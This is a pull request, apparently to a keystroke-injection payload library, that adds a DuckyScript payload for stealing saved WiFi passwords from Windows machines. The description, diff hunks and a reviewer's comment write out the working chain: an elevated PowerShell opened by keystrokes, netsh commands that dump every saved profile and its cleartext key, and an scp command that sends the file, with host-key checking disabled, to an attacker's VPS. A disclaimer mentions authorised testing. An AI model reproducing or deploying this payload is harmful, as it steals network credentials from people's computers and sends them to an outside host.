### PR TITLE
WiFi-Passwords-Exfiltration-Via-SCP

### PR DESCRIPTION
**Pull request by F1ll0ry**
# WiFi Passwords Exfiltration via SCP

## Version: 1.0

Welcome to the WiFi Passwords Exfiltration via SCP payload! This payload is designed to find WiFi SSIDs and passwords on a Windows machine, save them to a file, and then exfiltrate the file to your VPS using SCP. It's a handy tool for white-hat penetration testers or anyone needing to gather WiFi credentials for legitimate purposes.

### How It Works

1. **Windows Detection**: The script checks if it's running on a Windows machine.
2. **PowerShell Execution**: It opens PowerShell in adminsitrator mode.
3. **WiFi Profiles and Passwords**: The script retrieves all WiFi profiles and their respective passwords from the machine.
4. **Save to File**: It saves this information to a text file in the temporary directory.
5. **Exfiltrate via SCP**: The file is then securely copied to your VPS using SCP.

### Prerequisites

1. **A VPS**: You'll need a VPS where you can receive the exfiltrated file. If you don't have one, you can set up a simple Linux VPS on platforms like DigitalOcean, AWS, or any provider of your choice.
2. **Modify the Script**: Before running the payload, replace the placeholder values for the VPS username, password, and IP address with your actual VPS details.

```plaintext
DEFINE #VPS_IP your_vps_ip
DEFINE #VPS_USER your_vps_username
DEFINE #VPS_PASS your_vps_password
Script Breakdown
The script includes the following key parts:

Open PowerShell: Opens PowerShell in administrator mode.
Retrieve WiFi Profiles: Runs netsh wlan show profiles to list all WiFi profiles.
Get WiFi Passwords: Retrieves the password for each profile by running netsh wlan show profile name=$profile key=clear.
Save to File: Saves the collected information to a text file in the temporary directory.
Securely Copy via SCP: Uses SCP with the -o StrictHostKeyChecking=no option to automatically accept new host keys and copies the file to the specified directory on the VPS.
Usage Instructions
Prepare the Script: Edit the script to include your VPS details.
Deploy the Payload: Run the script on the target Windows machine.
Check Your VPS: The WiFi credentials file should be securely transferred to your VPS.
Disclaimer
This script is intended for educational purposes and legitimate use only. Unauthorized use of this script on devices you do not own or have explicit permission to test is illegal and unethical. Always ensure you have proper authorization before running any penetration testing tools or scripts.

Enjoy and happy testing!

### CODE REVIEW

File: payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt [hunk 1]
```diff
@@ -0,0 +1,51 @@
+
+REM Title: WiFi Passwords Exfiltration via SCP
+REM Author: zb0r
+REM Version: 1.0
+REM Description: This script finds WiFi SSIDs and passwords on a Windows machine, saves them to a file, and sends the file to a VPS using SCP.
+REM You need a VPS to use this script. Replace the #VPS_USER with your VPS username, #VPS_PASS with your VPS password, and #VPS_IP with your VPS IP address.
+
+REM Passive Windows Detection Extension
+EXTENSION PASSIVE_WINDOWS_DETECT
```
Comment (dallaswinger) [inline payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt:9]: this is missing the contents of the extension. Probably a copy paste error.

File: payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt [hunk 2]
```diff
@@ -0,0 +1,91 @@
+REM Title: WiFi Passwords Exfiltration via SCP
```
Comment (hak5peaks) [inline payloads/library/exfiltration/WiFi-Passwords-Exfiltration/Payload.txt:1]: I would change your directory name to match the title of your payload, currently its `WiFi-Passwords-Exfiltration` Please change it to `WiFi-Passwords-Exfiltration-via-SCP` or something similar to match the payload name.

**Review by hak5peaks — CHANGES_REQUESTED** [review]

File: payloads/library/exfiltration/WiFi-Passwords-Exfiltration-Via-SCP/Payload.txt [hunk 3]
```diff
@@ -0,0 +1,91 @@
...
+STRING powershell
+CTRL SHIFT ENTER
+DELAY 1000
+LEFT
+DELAY 500
+ENTER
+DELAY 500
+
+REM Find WiFi profiles and passwords
+STRINGLN $profiles = (netsh wlan show profiles) | Select-String "All User Profile" | ForEach-Object { $_ -replace "    All User Profile     : ", "" } | ForEach-Object { $_.Trim() }
```
Comment (hak5peaks) [inline payloads/library/exfiltration/WiFi-Passwords-Exfiltration-Via-SCP/Payload.txt:67]: I  noticing you are using a bunch of `STRINGLN` for the PowerShell. `STRINGLN` blocks can be used effectively to convert multiple lines into one without needing to prepend each line with  `STRINGLN`

for example 
```
STRINGLN
    a
    b
    c
END_STRINGLN
```

is the equivalent of 

```
STRINGLN a
STRINGLN b
STRINGLN c
 ```

for example using your code:  

```
STRINGLN_POWERSHELL
 $profiles = (netsh wlan show profiles) | Select-String "All User Profile" | ForEach-Object { $_ -replace "    All User Profile     : ", "" } | ForEach-Object { $_.Trim() }
foreach ($profile in $profiles) { $profileName = $profile; $profileInfo = (netsh wlan show profile name=$profile key=clear) | Select-String "SSID", "Key Content"; $wifiInfo += [PSCustomObject]@{ ProfileName = $profileName; Password = $profileInfo -replace ".*Key Content            : ", "" } }
$filePath = "$env:TEMP\wifi_profiles.txt"
$wifiInfo | Format-Table -AutoSize | Out-File -FilePath $filePath
scp -o StrictHostKeyChecking=no $filePath #VPS_USER@#VPS_IP:/home/#VPS_USER/Desktop/wifipass.txt
#VPS_PASS
END_STRINGLN
```

adding `STRINGLN_POWERSHELL` will also add PowerShell syntax highlight in `Payloadstudio` making readability easier.

**Review by hak5peaks — CHANGES_REQUESTED** [review]

File: payloads/library/exfiltration/WiFi-Passwords-Exfiltration-Via-SCP/Payload.txt (hunk 3 above)
Comment (F1ll0ry) [reply payloads/library/exfiltration/WiFi-Passwords-Exfiltration-Via-SCP/Payload.txt:67]: Noted! did not know that. I will fix it now.

Comment (F1ll0ry) [reply payloads/library/exfiltration/WiFi-Passwords-Exfiltration-Via-SCP/Payload.txt:67]: Okay, after carefully reviewing the script, I need to insert delays so I will not be implementing this structure in this specific script. Thank you!

**Pull request merged**